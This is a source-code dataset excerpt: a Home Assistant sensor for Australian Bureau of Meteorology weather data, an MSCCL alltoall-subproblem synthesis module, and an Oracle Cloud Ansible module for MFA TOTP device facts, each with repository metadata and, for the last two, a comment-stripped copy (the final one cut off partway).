|
import datetime
import ftplib
import gzip
import io
import json
import logging
import os
import re
import zipfile
import requests
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_MONITORED_CONDITIONS,
TEMP_CELSIUS,
CONF_NAME,
ATTR_ATTRIBUTION,
CONF_LATITUDE,
CONF_LONGITUDE,
)
from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
_RESOURCE = "http://www.bom.gov.au/fwo/{}/{}.{}.json"
_LOGGER = logging.getLogger(__name__)
ATTR_LAST_UPDATE = "last_update"
ATTR_SENSOR_ID = "sensor_id"
ATTR_STATION_ID = "station_id"
ATTR_STATION_NAME = "station_name"
ATTR_ZONE_ID = "zone_id"
ATTRIBUTION = "Data provided by the Australian Bureau of Meteorology"
CONF_STATION = "station"
CONF_ZONE_ID = "zone_id"
CONF_WMO_ID = "wmo_id"
MIN_TIME_BETWEEN_UPDATES = datetime.timedelta(seconds=60)
SENSOR_TYPES = {
"wmo": ["wmo", None],
"name": ["Station Name", None],
"history_product": ["Zone", None],
"local_date_time": ["Local Time", None],
"local_date_time_full": ["Local Time Full", None],
"aifstime_utc": ["UTC Time Full", None],
"lat": ["Lat", None],
"lon": ["Long", None],
"apparent_t": ["Feels Like C", TEMP_CELSIUS],
"cloud": ["Cloud", None],
"cloud_base_m": ["Cloud Base", None],
"cloud_oktas": ["Cloud Oktas", None],
"cloud_type_id": ["Cloud Type ID", None],
"cloud_type": ["Cloud Type", None],
"delta_t": ["Delta Temp C", TEMP_CELSIUS],
"gust_kmh": ["Wind Gust kmh", "km/h"],
"gust_kt": ["Wind Gust kt", "kt"],
"air_temp": ["Air Temp C", TEMP_CELSIUS],
"dewpt": ["Dew Point C", TEMP_CELSIUS],
"press": ["Pressure mb", "mbar"],
"press_qnh": ["Pressure qnh", "qnh"],
"press_msl": ["Pressure msl", "msl"],
"press_tend": ["Pressure Tend", None],
"rain_trace": ["Rain Today", "mm"],
"rel_hum": ["Relative Humidity", "%"],
"sea_state": ["Sea State", None],
"swell_dir_worded": ["Swell Direction", None],
"swell_height": ["Swell Height", "m"],
"swell_period": ["Swell Period", None],
"vis_km": ["Visability km", "km"],
"weather": ["Weather", None],
"wind_dir": ["Wind Direction", None],
"wind_spd_kmh": ["Wind Speed kmh", "km/h"],
"wind_spd_kt": ["Wind Speed kt", "kt"],
}
def validate_station(station):
if station is None:
return
station = station.replace(".shtml", "")
if not re.fullmatch(r"ID[A-Z]\d\d\d\d\d\.\d\d\d\d\d", station):
raise vol.error.Invalid("Malformed station ID")
return station
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Inclusive(CONF_ZONE_ID, "Deprecated partial station ID"): cv.string,
vol.Inclusive(CONF_WMO_ID, "Deprecated partial station ID"): cv.string,
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_STATION): validate_station,
vol.Required(CONF_MONITORED_CONDITIONS, default=[]): vol.All(
cv.ensure_list, [vol.In(SENSOR_TYPES)]
),
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
station = config.get(CONF_STATION)
zone_id, wmo_id = config.get(CONF_ZONE_ID), config.get(CONF_WMO_ID)
if station is not None:
if zone_id and wmo_id:
_LOGGER.warning(
"Using config %s, not %s and %s for BOM sensor",
CONF_STATION,
CONF_ZONE_ID,
CONF_WMO_ID,
)
elif zone_id and wmo_id:
station = "{}.{}".format(zone_id, wmo_id)
else:
station = closest_station(
config.get(CONF_LATITUDE),
config.get(CONF_LONGITUDE),
hass.config.config_dir,
)
if station is None:
_LOGGER.error("Could not get BOM weather station from lat/lon")
return
bom_data = BOMCurrentData(station)
try:
bom_data.update()
except ValueError as err:
_LOGGER.error("Received error from BOM Current: %s", err)
return
add_entities(
[
BOMCurrentSensor(bom_data, variable, config.get(CONF_NAME))
for variable in config[CONF_MONITORED_CONDITIONS]
]
)
class BOMCurrentSensor(Entity):
def __init__(self, bom_data, condition, stationname):
self.bom_data = bom_data
self._condition = condition
self.stationname = stationname
@property
def name(self):
if self.stationname is None:
return "BOM {}".format(SENSOR_TYPES[self._condition][0])
return "BOM {} {}".format(self.stationname, SENSOR_TYPES[self._condition][0])
@property
def state(self):
return self.bom_data.get_reading(self._condition)
@property
def device_state_attributes(self):
attr = {
ATTR_ATTRIBUTION: ATTRIBUTION,
ATTR_LAST_UPDATE: self.bom_data.last_updated,
ATTR_SENSOR_ID: self._condition,
ATTR_STATION_ID: self.bom_data.latest_data["wmo"],
ATTR_STATION_NAME: self.bom_data.latest_data["name"],
ATTR_ZONE_ID: self.bom_data.latest_data["history_product"],
}
return attr
@property
def unit_of_measurement(self):
return SENSOR_TYPES[self._condition][1]
def update(self):
self.bom_data.update()
class BOMCurrentData:
def __init__(self, station_id):
self._zone_id, self._wmo_id = station_id.split(".")
self._data = None
self.last_updated = None
def _build_url(self):
url = _RESOURCE.format(self._zone_id, self._zone_id, self._wmo_id)
_LOGGER.debug("BOM URL: %s", url)
return url
@property
def latest_data(self):
if self._data:
return self._data[0]
return None
def get_reading(self, condition):
condition_readings = (entry[condition] for entry in self._data)
return next((x for x in condition_readings if x != "-"), None)
def should_update(self):
if self.last_updated is None:
return True
now = datetime.datetime.now()
update_due_at = self.last_updated + datetime.timedelta(minutes=35)
return now > update_due_at
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
if not self.should_update():
_LOGGER.debug(
"BOM was updated %s minutes ago, skipping update as"
" < 35 minutes, Now: %s, LastUpdate: %s",
(datetime.datetime.now() - self.last_updated),
datetime.datetime.now(),
self.last_updated,
)
return
try:
result = requests.get(self._build_url(), timeout=10).json()
self._data = result["observations"]["data"]
self.last_updated = datetime.datetime.strptime(
str(self._data[0]["local_date_time_full"]), "%Y%m%d%H%M%S"
)
return
except ValueError as err:
_LOGGER.error("Check BOM %s", err.args)
self._data = None
raise
def _get_bom_stations():
latlon = {}
with io.BytesIO() as file_obj:
with ftplib.FTP("ftp.bom.gov.au") as ftp:
ftp.login()
ftp.cwd("anon2/home/ncc/metadata/sitelists")
ftp.retrbinary("RETR stations.zip", file_obj.write)
file_obj.seek(0)
with zipfile.ZipFile(file_obj) as zipped:
with zipped.open("stations.txt") as station_txt:
for _ in range(4):
station_txt.readline()
while True:
line = station_txt.readline().decode().strip()
if len(line) < 120:
break
wmo, lat, lon = (
line[a:b].strip() for a, b in [(128, 134), (70, 78), (79, 88)]
)
if wmo != "..":
latlon[wmo] = (float(lat), float(lon))
zones = {}
pattern = (
r'<a href="/products/(?P<zone>ID[A-Z]\d\d\d\d\d)/'
r'(?P=zone)\.(?P<wmo>\d\d\d\d\d).shtml">'
)
for state in ("nsw", "vic", "qld", "wa", "tas", "nt"):
url = "http://www.bom.gov.au/{0}/observations/{0}all.shtml".format(state)
for zone_id, wmo_id in re.findall(pattern, requests.get(url).text):
zones[wmo_id] = zone_id
return {"{}.{}".format(zones[k], k): latlon[k] for k in set(latlon) & set(zones)}
def bom_stations(cache_dir):
cache_file = os.path.join(cache_dir, ".bom-stations.json.gz")
if not os.path.isfile(cache_file):
stations = _get_bom_stations()
with gzip.open(cache_file, "wt") as cache:
json.dump(stations, cache, sort_keys=True)
return stations
with gzip.open(cache_file, "rt") as cache:
return {k: tuple(v) for k, v in json.load(cache).items()}
def closest_station(lat, lon, cache_dir):
if lat is None or lon is None or not os.path.isdir(cache_dir):
return
stations = bom_stations(cache_dir)
def comparable_dist(wmo_id):
station_lat, station_lon = stations[wmo_id]
return (lat - station_lat) ** 2 + (lon - station_lon) ** 2
return min(stations, key=comparable_dist)
| true
| true
|
790b2e75e195f6e48d17b20887b50e09e339d377
| 10,140
|
py
|
Python
|
msccl/distributors/alltoall_subproblem.py
|
angelica-moreira/sccl
|
db40eb2e8ec43990686739a1be0893e69ae99f06
|
[
"MIT"
] | 1
|
2022-03-03T02:33:15.000Z
|
2022-03-03T02:33:15.000Z
|
msccl/distributors/alltoall_subproblem.py
|
angelica-moreira/sccl
|
db40eb2e8ec43990686739a1be0893e69ae99f06
|
[
"MIT"
] | null | null | null |
msccl/distributors/alltoall_subproblem.py
|
angelica-moreira/sccl
|
db40eb2e8ec43990686739a1be0893e69ae99f06
|
[
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
from msccl.collectives import *
from msccl.algorithm import *
from msccl.instance import *
from msccl.topologies import *
def _alltoall_subproblem(local_nodes, num_copies):
remote_node = local_nodes
local_end = local_nodes * local_nodes
num_remote_pairs = (num_copies - 1) * local_nodes * local_nodes
remote_out_end = local_end + num_remote_pairs
num_chunks = remote_out_end + num_remote_pairs
def cases(chunk, local,remote_out,remote_in):
if chunk < local_end:
return local(chunk)
elif chunk < remote_out_end:
return remote_out(chunk - local_end)
else:
return remote_in(chunk - remote_out_end)
def pre(rank, chunk):
return cases(chunk,
lambda c: rank == c % local_nodes,
lambda c: rank == (c // (num_copies - 1)) % local_nodes,
lambda c: rank == remote_node)
def post(rank, chunk):
return cases(chunk,
lambda c: rank == c // local_nodes,
lambda c: rank == remote_node,
lambda c: rank == (c // (num_copies - 1)) // local_nodes)
def trigger(rank, chunk):
if rank == remote_node:
return cases(chunk,
lambda c: None,
lambda c: chunk + num_remote_pairs,
lambda c: chunk - num_remote_pairs)
else:
return None
return build_collective(f'AlltoallSubproblem(n={local_nodes},copies={num_copies})',
local_nodes + 1, num_chunks,
pre, post, trigger=trigger)
def make_alltoall_subproblem_collective_and_topology(topology, num_copies, relay_nodes, bw = 1, share_bw = False):
local_nodes = topology.num_nodes()
remote_node = local_nodes
links = [[0 for _ in range(local_nodes + 1)] for _ in range(local_nodes + 1)]
for src in range(local_nodes):
for dst in range(local_nodes):
links[dst][src] = topology.link(src, dst)
for relay in relay_nodes:
links[remote_node][relay] = bw
links[relay][remote_node] = bw
switches = topology.switches.copy()
if share_bw:
switches.append((relay_nodes, [num_nodes + 1], bw, 'remote_out'))
switches.append(([num_nodes + 1], relay_nodes, bw, 'remote_in'))
collective = _alltoall_subproblem(local_nodes, num_copies)
topology = Topology(f'Subtopo(local={topology.name},relays=({",".join(str(i) for i in relay_nodes)}))', links, topology.switches)
return collective, topology
def synthesize_alltoall_subproblem(subproblem_algo, num_copies, logging=False):
if subproblem_algo.is_pipelined():
raise ValueError('Pipelining is not supported.')
local_topology = subproblem_algo.topology
chunks = subproblem_algo.instance.chunks
local_nodes = local_topology.num_nodes() - 1
remote_node = local_nodes
nodes = local_nodes * num_copies
collective = alltoall(nodes).chunk_up(chunks)
# Create a distributed topology where copies of relay nodes that connect to the remote node in the subproblem
# topology are connected to all the relay nodes in the other copies.
links = [[0 for _ in range(nodes)] for _ in range(nodes)]
for dst in range(nodes):
for src in range(nodes):
local_src = src % local_nodes
local_dst = dst % local_nodes
if src // local_nodes != dst // local_nodes:
bw = min(local_topology.link(local_src, remote_node), local_topology.link(remote_node, local_dst))
links[dst][src] = bw
else:
links[dst][src] = local_topology.link(local_src, local_dst)
# Also make copies of switches with a similar expansion of the remote node into the nodes of other copies.
switches = []
for srcs, dsts, bw, name in local_topology.switches:
for i in range(num_copies):
def to_dist(ranks):
for rank in ranks:
if rank < remote_node:
# Non-remote nodes are just translated to the distributed numbering of ranks.
yield rank + i * local_nodes
else:
# Include all remote nodes in the switch. This is fine because the links already limit
# connectivity to just the relay nodes.
for r in range(nodes):
if r // local_nodes != i:
yield r
dist_srcs = list(to_dist(srcs))
dist_dsts = list(to_dist(dsts))
switches.append((dist_srcs, dist_dsts, bw, f'copy_{i}_{name}_local'))
topology = Topology(f'Stiched(sub={local_topology.name},copies={num_copies})', links, switches)
def nth_chunk_for_pair(src, dst, idx):
# The following chunk calculation respects both the _scattered and _transpose
# pre/postconditions in Alltoall. When substituting it in:
# -the precondition (chunk % self.num_nodes) simplifies to src
# -the postcondition ((chunk // self.num_nodes) % self.num_nodes) simplifies to dst
return (src + dst * collective.num_nodes) * chunks + idx
steps = []
# Calculate the ranges of the differently handled chunks
local_end = local_nodes * local_nodes
num_remote_pairs = (num_copies - 1) * local_nodes * local_nodes
remote_out_end = local_end + num_remote_pairs
num_chunks = remote_out_end + num_remote_pairs
for local_step in subproblem_algo.steps:
sends = []
# These are used to track operations involving remote nodes that get matched with another operation in the same
# step.
unmatched_sends = {}
unmatched_recvs = {}
# Stitch together copies of the subproblem algorithm
for chunk, src, dst in local_step.sends:
for i in range(num_copies):
def to_dist(rank):
# Translates ranks from the local to the distributed topology
return rank + i * local_nodes
def other_start(c):
# Given a relative remote chunk return local rank 0 in the copy it corresponds to
other_i = c % (num_copies - 1)
if other_i >= i:
other_i += 1
return other_i * local_nodes
# Calculate origin and target ranks that match the Alltoall pre/postconditions
if chunk < local_end:
assert src != remote_node and dst != remote_node
origin = to_dist((chunk // chunks) % local_nodes)
target = to_dist((chunk // chunks) // local_nodes)
# Check that the origin and target calculation match the local collective
assert subproblem_algo.collective.precondition(origin % local_nodes, chunk)
assert subproblem_algo.collective.postcondition(target % local_nodes, chunk)
elif chunk < remote_out_end:
c = chunk - local_end
local_origin = ((c // chunks) // (num_copies - 1)) % local_nodes
origin = to_dist(local_origin)
target = other_start(c) + ((c // (num_copies - 1))) // local_nodes
# Check that the origin and target calculation match the local collective
assert subproblem_algo.collective.precondition(local_origin, chunk)
assert subproblem_algo.collective.postcondition(target % local_nodes, chunk + num_remote_pairs)
else:
assert chunk < num_chunks
c = chunk - remote_out_end
local_target = ((c // chunks) // (num_copies - 1)) // local_nodes
target = to_dist(local_target)
origin = other_start(c) + ((c // (num_copies - 1))) % local_nodes
# Check that the origin and target calculation match the local collective
assert subproblem_algo.collective.precondition(origin % local_nodes, chunk - num_remote_pairs)
assert subproblem_algo.collective.postcondition(local_target, chunk)
# Get the chunk number in the distributed algorithm
chunk_idx = chunk % chunks
# Translate send src and dst to distributed space and add the send to the distributed algorithm
dist_chunk = nth_chunk_for_pair(origin, target, chunk_idx)
if dst == remote_node:
assert chunk < remote_out_end
# Sends to remote nodes have to find a matched receive
if dist_chunk in unmatched_recvs:
dist_dst = unmatched_recvs.pop(dist_chunk)
sends.append((dist_chunk, to_dist(src), dist_dst))
else:
unmatched_sends[dist_chunk] = to_dist(src)
elif src == remote_node:
assert chunk < num_chunks
# Receives from remote nodes have to find a matched send
if dist_chunk in unmatched_sends:
dist_src = unmatched_sends.pop(dist_chunk)
sends.append((dist_chunk, dist_src, to_dist(dst)))
else:
unmatched_recvs[dist_chunk] = to_dist(dst)
else:
# Sends locally are just translated to the new distributed space of ranks
sends.append((dist_chunk, to_dist(src), to_dist(dst)))
if len(unmatched_sends) > 0 or len(unmatched_recvs) > 0:
raise ValueError('Subproblem algorithm has unpaired sends/recvs.')
steps.append(Step(local_step.rounds, sends))
instance = Instance(
steps=len(steps),
extra_rounds=sum(step.rounds - 1 for step in steps),
chunks=chunks,
)
return Algorithm.make_implementation(collective, topology, instance, steps)
| 45.267857
| 133
| 0.60355
|
from msccl.collectives import *
from msccl.algorithm import *
from msccl.instance import *
from msccl.topologies import *
def _alltoall_subproblem(local_nodes, num_copies):
remote_node = local_nodes
local_end = local_nodes * local_nodes
num_remote_pairs = (num_copies - 1) * local_nodes * local_nodes
remote_out_end = local_end + num_remote_pairs
num_chunks = remote_out_end + num_remote_pairs
def cases(chunk, local,remote_out,remote_in):
if chunk < local_end:
return local(chunk)
elif chunk < remote_out_end:
return remote_out(chunk - local_end)
else:
return remote_in(chunk - remote_out_end)
def pre(rank, chunk):
return cases(chunk,
lambda c: rank == c % local_nodes,
lambda c: rank == (c // (num_copies - 1)) % local_nodes,
lambda c: rank == remote_node)
def post(rank, chunk):
return cases(chunk,
lambda c: rank == c // local_nodes,
lambda c: rank == remote_node,
lambda c: rank == (c // (num_copies - 1)) // local_nodes)
def trigger(rank, chunk):
if rank == remote_node:
return cases(chunk,
lambda c: None,
lambda c: chunk + num_remote_pairs,
lambda c: chunk - num_remote_pairs)
else:
return None
return build_collective(f'AlltoallSubproblem(n={local_nodes},copies={num_copies})',
local_nodes + 1, num_chunks,
pre, post, trigger=trigger)
def make_alltoall_subproblem_collective_and_topology(topology, num_copies, relay_nodes, bw = 1, share_bw = False):
local_nodes = topology.num_nodes()
remote_node = local_nodes
links = [[0 for _ in range(local_nodes + 1)] for _ in range(local_nodes + 1)]
for src in range(local_nodes):
for dst in range(local_nodes):
links[dst][src] = topology.link(src, dst)
for relay in relay_nodes:
links[remote_node][relay] = bw
links[relay][remote_node] = bw
switches = topology.switches.copy()
if share_bw:
switches.append((relay_nodes, [num_nodes + 1], bw, 'remote_out'))
switches.append(([num_nodes + 1], relay_nodes, bw, 'remote_in'))
collective = _alltoall_subproblem(local_nodes, num_copies)
topology = Topology(f'Subtopo(local={topology.name},relays=({",".join(str(i) for i in relay_nodes)}))', links, topology.switches)
return collective, topology
def synthesize_alltoall_subproblem(subproblem_algo, num_copies, logging=False):
if subproblem_algo.is_pipelined():
raise ValueError('Pipelining is not supported.')
local_topology = subproblem_algo.topology
chunks = subproblem_algo.instance.chunks
local_nodes = local_topology.num_nodes() - 1
remote_node = local_nodes
nodes = local_nodes * num_copies
collective = alltoall(nodes).chunk_up(chunks)
links = [[0 for _ in range(nodes)] for _ in range(nodes)]
for dst in range(nodes):
for src in range(nodes):
local_src = src % local_nodes
local_dst = dst % local_nodes
if src // local_nodes != dst // local_nodes:
bw = min(local_topology.link(local_src, remote_node), local_topology.link(remote_node, local_dst))
links[dst][src] = bw
else:
links[dst][src] = local_topology.link(local_src, local_dst)
switches = []
for srcs, dsts, bw, name in local_topology.switches:
for i in range(num_copies):
def to_dist(ranks):
for rank in ranks:
if rank < remote_node:
yield rank + i * local_nodes
else:
for r in range(nodes):
if r // local_nodes != i:
yield r
dist_srcs = list(to_dist(srcs))
dist_dsts = list(to_dist(dsts))
switches.append((dist_srcs, dist_dsts, bw, f'copy_{i}_{name}_local'))
topology = Topology(f'Stiched(sub={local_topology.name},copies={num_copies})', links, switches)
def nth_chunk_for_pair(src, dst, idx):
return (src + dst * collective.num_nodes) * chunks + idx
steps = []
local_end = local_nodes * local_nodes
num_remote_pairs = (num_copies - 1) * local_nodes * local_nodes
remote_out_end = local_end + num_remote_pairs
num_chunks = remote_out_end + num_remote_pairs
for local_step in subproblem_algo.steps:
sends = []
unmatched_sends = {}
unmatched_recvs = {}
for chunk, src, dst in local_step.sends:
for i in range(num_copies):
def to_dist(rank):
return rank + i * local_nodes
def other_start(c):
other_i = c % (num_copies - 1)
if other_i >= i:
other_i += 1
return other_i * local_nodes
if chunk < local_end:
assert src != remote_node and dst != remote_node
origin = to_dist((chunk // chunks) % local_nodes)
target = to_dist((chunk // chunks) // local_nodes)
assert subproblem_algo.collective.precondition(origin % local_nodes, chunk)
assert subproblem_algo.collective.postcondition(target % local_nodes, chunk)
elif chunk < remote_out_end:
c = chunk - local_end
local_origin = ((c // chunks) // (num_copies - 1)) % local_nodes
origin = to_dist(local_origin)
target = other_start(c) + ((c // (num_copies - 1))) // local_nodes
assert subproblem_algo.collective.precondition(local_origin, chunk)
assert subproblem_algo.collective.postcondition(target % local_nodes, chunk + num_remote_pairs)
else:
assert chunk < num_chunks
c = chunk - remote_out_end
local_target = ((c // chunks) // (num_copies - 1)) // local_nodes
target = to_dist(local_target)
origin = other_start(c) + ((c // (num_copies - 1))) % local_nodes
assert subproblem_algo.collective.precondition(origin % local_nodes, chunk - num_remote_pairs)
assert subproblem_algo.collective.postcondition(local_target, chunk)
chunk_idx = chunk % chunks
dist_chunk = nth_chunk_for_pair(origin, target, chunk_idx)
if dst == remote_node:
assert chunk < remote_out_end
if dist_chunk in unmatched_recvs:
dist_dst = unmatched_recvs.pop(dist_chunk)
sends.append((dist_chunk, to_dist(src), dist_dst))
else:
unmatched_sends[dist_chunk] = to_dist(src)
elif src == remote_node:
assert chunk < num_chunks
if dist_chunk in unmatched_sends:
dist_src = unmatched_sends.pop(dist_chunk)
sends.append((dist_chunk, dist_src, to_dist(dst)))
else:
unmatched_recvs[dist_chunk] = to_dist(dst)
else:
sends.append((dist_chunk, to_dist(src), to_dist(dst)))
if len(unmatched_sends) > 0 or len(unmatched_recvs) > 0:
raise ValueError('Subproblem algorithm has unpaired sends/recvs.')
steps.append(Step(local_step.rounds, sends))
instance = Instance(
steps=len(steps),
extra_rounds=sum(step.rounds - 1 for step in steps),
chunks=chunks,
)
return Algorithm.make_implementation(collective, topology, instance, steps)
| true
| true
|
790b3063b426f898769b92541a7cd32a79c0cecb
| 8,111
|
py
|
Python
|
plugins/modules/oci_identity_mfa_totp_device_facts.py
|
hanielburton/oci-ansible-collection
|
dfdffde637f746d346ba35569be8c3a3407022f2
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_identity_mfa_totp_device_facts.py
|
hanielburton/oci-ansible-collection
|
dfdffde637f746d346ba35569be8c3a3407022f2
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_identity_mfa_totp_device_facts.py
|
hanielburton/oci-ansible-collection
|
dfdffde637f746d346ba35569be8c3a3407022f2
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# Copyright (c) 2017, 2021 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_identity_mfa_totp_device_facts
short_description: Fetches details about one or multiple MfaTotpDevice resources in Oracle Cloud Infrastructure
description:
- Fetches details about one or multiple MfaTotpDevice resources in Oracle Cloud Infrastructure
- Lists the MFA TOTP devices for the specified user. The returned object contains the device's OCID, but not
the seed. The seed is returned only upon creation or when the IAM service regenerates the MFA seed for the device.
- If I(mfa_totp_device_id) is specified, the details of a single MfaTotpDevice will be returned.
version_added: "2.9"
author: Oracle (@oracle)
options:
user_id:
description:
- The OCID of the user.
type: str
required: true
mfa_totp_device_id:
description:
- The OCID of the MFA TOTP device.
- Required to get a specific mfa_totp_device.
type: str
aliases: ["id"]
sort_by:
description:
- The field to sort by. You can provide one sort order (`sortOrder`). Default order for
TIMECREATED is descending. Default order for NAME is ascending. The NAME
sort order is case sensitive.
- "**Note:** In general, some \\"List\\" operations (for example, `ListInstances`) let you
optionally filter by Availability Domain if the scope of the resource type is within a
single Availability Domain. If you call one of these \\"List\\" operations without specifying
an Availability Domain, the resources are grouped by Availability Domain, then sorted."
type: str
choices:
- "TIMECREATED"
- "NAME"
sort_order:
description:
- The sort order to use, either ascending (`ASC`) or descending (`DESC`). The NAME sort order
is case sensitive.
type: str
choices:
- "ASC"
- "DESC"
extends_documentation_fragment: [ oracle.oci.oracle ]
"""
EXAMPLES = """
- name: List mfa_totp_devices
oci_identity_mfa_totp_device_facts:
user_id: ocid1.user.oc1..xxxxxxEXAMPLExxxxxx
- name: Get a specific mfa_totp_device
oci_identity_mfa_totp_device_facts:
user_id: ocid1.user.oc1..xxxxxxEXAMPLExxxxxx
mfa_totp_device_id: ocid1.mfatotpdevice.oc1..xxxxxxEXAMPLExxxxxx
"""
RETURN = """
mfa_totp_devices:
description:
- List of MfaTotpDevice resources
returned: on success
type: complex
contains:
id:
description:
- The OCID of the MFA TOTP Device.
returned: on success
type: string
sample: ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx
user_id:
description:
- The OCID of the user the MFA TOTP device belongs to.
returned: on success
type: string
sample: ocid1.user.oc1..xxxxxxEXAMPLExxxxxx
time_created:
description:
- Date and time the `MfaTotpDevice` object was created, in the format defined by RFC3339.
- "Example: `2016-08-25T21:10:29.600Z`"
returned: on success
type: string
sample: 2016-08-25T21:10:29.600Z
time_expires:
description:
- Date and time when this MFA TOTP device will expire, in the format defined by RFC3339.
Null if it never expires.
- "Example: `2016-08-25T21:10:29.600Z`"
returned: on success
type: string
sample: 2016-08-25T21:10:29.600Z
lifecycle_state:
description:
- The MFA TOTP device's current state.
returned: on success
type: string
sample: CREATING
inactive_status:
description:
- "The detailed status of INACTIVE lifecycleState.
Allowed values are:
- 1 - SUSPENDED
- 2 - DISABLED
- 4 - BLOCKED
- 8 - LOCKED"
returned: on success
type: int
sample: 56
is_activated:
description:
- Flag to indicate if the MFA TOTP device has been activated
returned: on success
type: bool
sample: true
sample: [{
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"user_id": "ocid1.user.oc1..xxxxxxEXAMPLExxxxxx",
"time_created": "2016-08-25T21:10:29.600Z",
"time_expires": "2016-08-25T21:10:29.600Z",
"lifecycle_state": "CREATING",
"inactive_status": 56,
"is_activated": true
}]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceFactsHelperBase,
get_custom_class,
)
try:
from oci.identity import IdentityClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class MfaTotpDeviceFactsHelperGen(OCIResourceFactsHelperBase):
"""Supported operations: get, list"""
def get_required_params_for_get(self):
return [
"user_id",
"mfa_totp_device_id",
]
def get_required_params_for_list(self):
return [
"user_id",
]
def get_resource(self):
return oci_common_utils.call_with_backoff(
self.client.get_mfa_totp_device,
user_id=self.module.params.get("user_id"),
mfa_totp_device_id=self.module.params.get("mfa_totp_device_id"),
)
def list_resources(self):
optional_list_method_params = [
"sort_by",
"sort_order",
]
optional_kwargs = dict(
(param, self.module.params[param])
for param in optional_list_method_params
if self.module.params.get(param) is not None
)
return oci_common_utils.list_all_resources(
self.client.list_mfa_totp_devices,
user_id=self.module.params.get("user_id"),
**optional_kwargs
)
MfaTotpDeviceFactsHelperCustom = get_custom_class("MfaTotpDeviceFactsHelperCustom")
class ResourceFactsHelper(MfaTotpDeviceFactsHelperCustom, MfaTotpDeviceFactsHelperGen):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec()
module_args.update(
dict(
user_id=dict(type="str", required=True),
mfa_totp_device_id=dict(aliases=["id"], type="str"),
sort_by=dict(type="str", choices=["TIMECREATED", "NAME"]),
sort_order=dict(type="str", choices=["ASC", "DESC"]),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_facts_helper = ResourceFactsHelper(
module=module,
resource_type="mfa_totp_device",
service_client_class=IdentityClient,
namespace="identity",
)
result = []
if resource_facts_helper.is_get():
result = [resource_facts_helper.get()]
elif resource_facts_helper.is_list():
result = resource_facts_helper.list()
else:
resource_facts_helper.fail()
module.exit_json(mfa_totp_devices=result)
if __name__ == "__main__":
main()
| 33.241803
| 120
| 0.631365
|
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_identity_mfa_totp_device_facts
short_description: Fetches details about one or multiple MfaTotpDevice resources in Oracle Cloud Infrastructure
description:
- Fetches details about one or multiple MfaTotpDevice resources in Oracle Cloud Infrastructure
- Lists the MFA TOTP devices for the specified user. The returned object contains the device's OCID, but not
the seed. The seed is returned only upon creation or when the IAM service regenerates the MFA seed for the device.
- If I(mfa_totp_device_id) is specified, the details of a single MfaTotpDevice will be returned.
version_added: "2.9"
author: Oracle (@oracle)
options:
user_id:
description:
- The OCID of the user.
type: str
required: true
mfa_totp_device_id:
description:
- The OCID of the MFA TOTP device.
- Required to get a specific mfa_totp_device.
type: str
aliases: ["id"]
sort_by:
description:
- The field to sort by. You can provide one sort order (`sortOrder`). Default order for
TIMECREATED is descending. Default order for NAME is ascending. The NAME
sort order is case sensitive.
- "**Note:** In general, some \\"List\\" operations (for example, `ListInstances`) let you
optionally filter by Availability Domain if the scope of the resource type is within a
single Availability Domain. If you call one of these \\"List\\" operations without specifying
an Availability Domain, the resources are grouped by Availability Domain, then sorted."
type: str
choices:
- "TIMECREATED"
- "NAME"
sort_order:
description:
- The sort order to use, either ascending (`ASC`) or descending (`DESC`). The NAME sort order
is case sensitive.
type: str
choices:
- "ASC"
- "DESC"
extends_documentation_fragment: [ oracle.oci.oracle ]
"""
EXAMPLES = """
- name: List mfa_totp_devices
oci_identity_mfa_totp_device_facts:
user_id: ocid1.user.oc1..xxxxxxEXAMPLExxxxxx
- name: Get a specific mfa_totp_device
oci_identity_mfa_totp_device_facts:
user_id: ocid1.user.oc1..xxxxxxEXAMPLExxxxxx
mfa_totp_device_id: ocid1.mfatotpdevice.oc1..xxxxxxEXAMPLExxxxxx
"""
RETURN = """
mfa_totp_devices:
description:
- List of MfaTotpDevice resources
returned: on success
type: complex
contains:
id:
description:
- The OCID of the MFA TOTP Device.
returned: on success
type: string
sample: ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx
user_id:
description:
- The OCID of the user the MFA TOTP device belongs to.
returned: on success
type: string
sample: ocid1.user.oc1..xxxxxxEXAMPLExxxxxx
time_created:
description:
- Date and time the `MfaTotpDevice` object was created, in the format defined by RFC3339.
- "Example: `2016-08-25T21:10:29.600Z`"
returned: on success
type: string
sample: 2016-08-25T21:10:29.600Z
time_expires:
description:
- Date and time when this MFA TOTP device will expire, in the format defined by RFC3339.
Null if it never expires.
- "Example: `2016-08-25T21:10:29.600Z`"
returned: on success
type: string
sample: 2016-08-25T21:10:29.600Z
lifecycle_state:
description:
- The MFA TOTP device's current state.
returned: on success
type: string
sample: CREATING
inactive_status:
description:
